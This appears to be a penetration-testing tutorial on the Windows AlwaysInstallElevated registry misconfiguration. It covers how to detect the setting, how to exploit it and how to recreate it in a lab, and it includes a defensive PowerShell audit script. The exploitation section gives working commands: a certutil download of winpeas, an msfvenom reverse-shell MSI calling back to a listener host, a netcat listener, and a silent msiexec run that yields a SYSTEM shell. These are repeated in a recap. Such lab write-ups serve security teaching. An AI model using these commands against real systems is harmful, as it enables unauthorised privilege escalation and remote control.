AlwaysInstallElevated


What is AlwaysInstallElevated?

“AlwaysInstallElevated” is a Windows registry setting that allows non-administrative users to install software with elevated privileges. This setting is designed for use in certain enterprise environments where a standard user may need to install software without requiring an administrator to enter their credentials.

Why is it dangerous?

If an attacker gains access to a system with this setting enabled, they can use it to install malware or other malicious software without needing to bypass the usual administrative controls. Because the Windows Installer service runs the package with elevated privileges, this lets them execute code as a highly privileged account, potentially giving them access to sensitive data or full control of the system.

In addition, if an attacker is able to modify the registry setting itself, they can potentially enable AlwaysInstallElevated and then use it to install malware or other malicious software without detection.


Topics covered

  • How to find the vulnerability manually and with winpeas
  • How to exploit it
  • How to recreate the vulnerability

Enumerate

Scenario: We landed a shell as user1 and want to escalate privileges.

Note: AlwaysInstallElevated needs to be enabled for both the current user and the local machine for this exploit to work.

The first enumeration method I’ll go over is manual enumeration. All we need to do is run the two commands below.

reg query "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer" /v AlwaysInstallElevated
reg query "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer" /v AlwaysInstallElevated

The 0x1 returned by both queries above tells us that AlwaysInstallElevated is enabled for both the local machine and the current user.
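As an added example that is not from the original post, the following PowerShell script performs the same two registry checks and flags the host only when both values are 1, which is the condition the note above describes. The -Remediate switch is an assumption of this script (it needs an elevated prompt to write the HKLM value) and sets both values back to 0.

```powershell
# Added audit/remediation example, not part of the original post.
# Both policy values must be 1 for msiexec to run every MSI package elevated.
param([switch]$Remediate)

$Paths = @(
    'HKLM:\Software\Policies\Microsoft\Windows\Installer',
    'HKCU:\Software\Policies\Microsoft\Windows\Installer'
)

function Get-AlwaysInstallElevatedState {
    # One object per hive; Value is $null when the key or value is absent.
    foreach ($p in $Paths) {
        $v = (Get-ItemProperty -Path $p -Name AlwaysInstallElevated `
              -ErrorAction SilentlyContinue).AlwaysInstallElevated
        [pscustomobject]@{ Path = $p; Value = $v }
    }
}

function Test-AlwaysInstallElevated {
    # Exploitable only when BOTH hives hold a value of 1.
    $state = Get-AlwaysInstallElevatedState
    return @($state | Where-Object { $_.Value -eq 1 }).Count -eq 2
}

Get-AlwaysInstallElevatedState | Format-Table -AutoSize

if (Test-AlwaysInstallElevated) {
    Write-Warning 'AlwaysInstallElevated is set in both hives: any user can install MSI packages as SYSTEM.'
} else {
    Write-Host 'AlwaysInstallElevated is not fully enabled; msiexec will not elevate arbitrary packages.'
}

if ($Remediate) {
    # Hypothetical hardening step: disable the policy wherever the key exists.
    foreach ($p in $Paths) {
        if (Test-Path $p) {
            Set-ItemProperty -Path $p -Name AlwaysInstallElevated -Value 0 -Type DWord
        }
    }
    Write-Host 'AlwaysInstallElevated set to 0 in every hive where the Installer key exists.'
}
```

Run it from an elevated prompt when using -Remediate, since writing under HKLM requires administrative rights.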

To enumerate this with winpeas, we first need to transfer it to the target.

Host a Python web server on Kali in the directory where winpeas is located.

python3 -m http.server 80

Now let's use certutil.exe to bring winpeas over.

certutil.exe -urlcache -f http://192.168.4.4/winpeas.exe winpeas.exe

Run winpeas with the “systeminfo” argument. Scrolling through the output, we can see that AlwaysInstallElevated is set to 1, meaning it is enabled.


Exploiting

First, let's use msfvenom to create a reverse shell MSI file. MSI files are installer packages used on Windows operating systems to install and manage software applications.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.4.4 LPORT=53 --platform Windows -f msi > reverse.msi

Before downloading and executing the file on Windows, let's first create a netcat listener.

nc -lnvp 53

Now we can transfer the file. Host a Python web server on Kali and download it to Windows using certutil.exe the same way we downloaded winpeas.exe.

After the MSI file is downloaded to the Windows machine, we can use msiexec to execute it.

msiexec /quiet /qn /i reverse.msi

Back on the netcat listener, we get a shell as NT Authority\System.


Replicate the Vulnerability

Log into the Windows machine as an Administrator and open a command prompt.

First, we need to identify the SID of the user we want to give the vulnerability to.

wmic useraccount where name='user1' get sid

Now, open Registry Editor and go to the following registry key.

HKEY_USERS\<USER_SID>\Software\Policies\Microsoft\Windows

Once you’re there, right-click on the Windows key, then click New > Key.

Make sure you name the key “Installer”.

Now right-click on the “Installer” key and click “New” > “DWORD (32-bit) Value”.

Name it “AlwaysInstallElevated”.

Now right-click it and select “Modify”.

After that, change the Value data to 1.

To confirm that it worked, open a command prompt as user1 and type this:

reg query "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer" /v AlwaysInstallElevated

Recap

Run either winpeas.exe or the command below to check for the vulnerability.

reg query "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer" /v AlwaysInstallElevated

Create an MSI reverse shell with msfvenom.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<YOUR_IP> LPORT=53 --platform Windows -f msi > reverse.msi

Once you bring it over to the Windows machine, type the below to execute it.

msiexec /quiet /qn /i reverse.msi